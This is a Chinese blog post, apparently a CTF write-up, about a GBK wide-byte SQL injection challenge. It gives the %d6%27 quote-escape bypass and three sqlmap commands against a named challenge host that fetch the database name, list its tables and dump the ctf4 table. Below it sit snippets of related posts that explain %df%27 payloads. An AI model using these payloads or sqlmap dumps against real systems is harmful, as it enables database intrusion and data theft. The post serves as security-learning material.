南邮宽字节(sql_gbk)注入

最新推荐文章于 2023-10-10 12:37:18 发布
最新推荐文章于 2023-10-10 12:37:18 发布
阅读量965 收藏
点赞数
分类专栏: 渗透测试 文章标签: sqlmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CosmopolitanMe/article/details/82153319
版权

首先题目过滤了单引号,先绕过,用%d6%27来绕过,构成一个宽字节,取消了单引号的转义,直接上sqlmap

爆数据库:
python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --current-db

这里写图片描述

爆表名:
python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --tables -D sae-chinalover

这里写图片描述

爆ctf4表里面的数据:
python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --dump -T ctf4 -D sae-chinalover

这里写图片描述

Cosmop01itan
关注
专栏目录
第十九节 宽字节SQL注入-01
09-15
字节SQL注入是一种特殊类型的SQL注入攻击,主要针对使用宽字节字符集(如GBK、UTF-16等)的数据库管理系统。宽字节SQL注入攻击的关键在于exploit宽字节字符集的特性来 bypass 数据库的安全机制。 宽字节字符集 ...
渗透测试-SQL注入之宽字节注入
lza20001103的博客
04-20 9234
渗透测试-SQL注入之宽字节注入
SQL注入——宽字节注入
最新发布
weixin_74991270的博客
10-10 558
1.转义符“\”有些符号想让他当作单纯的字符,而不是当作符号的时候,一般可以用: \符号比如:\’ \\’   这种情况下,‘和"将被当作正常的字符在数据库之中’与"几乎没有区别,在php之中 ’ 包括的内容完全当作字符串,而 " 包括的内容会进一步进行解析例如:$a=‘hello’;echo ‘$a’;//输出:aecho “$a”;//输出:hello2.为什么产生编码:--为了处理英文字符,产生了ASCII码。
SQL注入09】宽字符注入基础与实操(基于sqli-labs-less32)
Fighting_hawk的博客
02-20 4017
1. 了解GBK编码简单信息; 2. 理解字节何时会被当做GBK进行解码; 3. 理解宽字符注入的原理; 4. 掌握宽字符注入的方法。
字节注入
u014794949
10-10 276
原因 宽字节注入主要是因为采用了GBK编码,一个gbk编码占用2个字节,一个utf-8占用3个字节 常规手段下只需要闭合单引号即可,但当存在转义处理时,需要对payload进行特殊构造 常规注入手段 select * from users where id = '1' order by 3 # ' limit 0,1 被过滤后会成为 select * from users where id = '1\'' limit 0,1 构造payload 原始数据 代码层过滤 url编码’ 1%d
gbk字符编码和宽字节sql注入
sworddancing is the best one
09-27 2613
ctf题目中宽字节注入是很常见的问题,我这篇文章的目的就是弄明白其中的原理。 通常来说,一个gbk编码的汉字通常占用两个字节,一个utf-8编码汉字,占用三个字节, 占用3个字节。在php中,我们可以通过输出 echo strlen("和"); 来测试。当将页面编码保存为gbk时输出2,utf-8时输出3。   说了这么多废话,现在来研究一下在SQL注入中,gbk字符编码带来的各种...
gbk.rar_GBK_gbk 判断汉字
09-19
标题中的"GBK.rar_GBK_gbk 判断汉字"暗示了这个压缩包里的主要内容是一个与GBK编码相关的程序,用于判断字符是否为汉字。GBK是中文简体字符集的一个标准,全称为“汉字内码扩展规范”(Gbk Generalized Bi-...
GBK.zip_GBK_delphi 字符转换_gbk delphi
09-23
"GBK.zip_GBK_delphi 字符转换_gbk delphi"这个标题暗示了我们正在讨论一个使用Delphi编程语言编写的程序,其核心功能是进行GBK字符编码的转换。GBK是一种广泛应用于简体中文环境的字符编码标准,它扩展了GB2312,...
gbk.rar_GBK_GBK Unicode_unicode gbk_unicode gbk
09-19
1. 字符编码理解:首先,开发者需要理解各种编码的原理,如GBK是双字节编码,每个字符占用2个字节,而Unicode(通常是UTF-8)的字符可能占1到4个字节不等。 2. 编码转换函数:在C语言中,可以使用`iconv`库进行编码...
SQL_Sever数据库常用语句大全.zip
06-18
SQL_Sever数据库常用语句大全.zip SQL_Sever数据库常用命令大全.zip power函数获取数值的n次方 round函数保留指定位数小数点(指定位数后四舍五入) sign函数判断正数负数和零 sqrt平方根函数 convert转换数据类型...
gbk字节注入
左手诗人 右手剑客
06-12 376
<?php //连接数据库部分,注意使用了gbk编码 $conn = mysql_connect('localhost', 'root', 'toor!@#$') or die('bad!'); mysql_query("SET NAMES 'gbk'"); mysql_select_db('test', $conn) OR emMsg("连接数据库失败,未找到您填写的数据库");...
【每天学习一点新知识】跟咩咩一起学“宽字节注入
RexHa的博客
10-19 2241
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节英文默认占一个字节,中文占两个字节
NCTF之GBK Injection另一种宽字节注入解法
克格莫(有需要的私信)
12-18 486
0x00题目: your sql:select id,title from news where id = '1' here is the information 0x01以前的题解是使用%df加上单引号,通过宽字节注入。另外#被转移,故使用%23代替#绕过。 但是今天我做的时候,发现另一个payload也可以: payload: 1’',此处第一个单引号是中文的 ‘,第二个单引号是英...
字节(宽字符)注入
Yatere的天平秤
04-24 2069
字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠/,变成了 %df/’,其中/的十六进制是 %5C ,那么现在 %df/’ = %df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MYSQLGBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df/’ = %df%5c%27=縗’,有了单引号就好注入了。比如:$conn = mysql_connect(”localho
gbk injection
sworddancing is the best one
09-27 977
以下是我在南邮上做的一道宽字节注入题,先将笔记总结于下,题目:   将网址复制下来,因为这将是我们进行注入的数据库的位置所在,因为该题提示是gbk数据库,所以咱们就有利用宽字节注入来解题的思路,接下来咱们用到sql注入工具的一款,sqlmap: 首先我们需要爆出数据库命令如下(爆出当前数据库(%df%27是双字节不转义单引号实现注入的方法--原理我会另外总结一片笔记出来链接:https://b...
DVWA——改GBK尝试宽字节注入(brute教程)
tempulcc的博客
09-04 519
为了测试DWVA中brute项目的medium等级的宽字节注入,学会了命令行改变数据库、数据表的字符编码,学会如何编写数据库连接代码,证实确实可以用宽字节绕过addslashes、mysqli_real_escape_string,mysqli_real_escape_string并不像别人所说的不会导致宽字节注入。唯一可惜的是直接在dvwa代谢medium.php并未成功,需要单独放到网站根目录下测试,已脱离dvwa系统的初始化代码的控制。
MySQL字节注入——关于GBK编码和UTF-8编码
公众号shadow sock7
04-02 5122
参考: http://blog.csdn.net/jnbbwyth/article/details/6991425 https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html这个文件原文只有ASCII字符,当我加上两个汉字之后就不得不变成了UTF-8字符。 iconv这个工具(MacOS, ubuntu和kali好像是自带的)
利用GBK字节编码突破PHP单引号转义限制进行SQL注入
Exploit的小站~
04-11 2987
今天看了黑防2009精华本下册《双字节编码:PHP的隐形杀手》一文,深受启发。 当php.ini中magic_quotes_gpc被设置为on时,提交的参数会被转义,例如,单引号会被转义成了'。一下子截断了字符型注入的路。 GBK字节编码:一个汉字用两个字节表示,首字节对应0x81-0xFE,尾字节对应0x40-0xFE(除0x7F),刚好涵盖了对应的编码0x5C。 0xD5 0
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值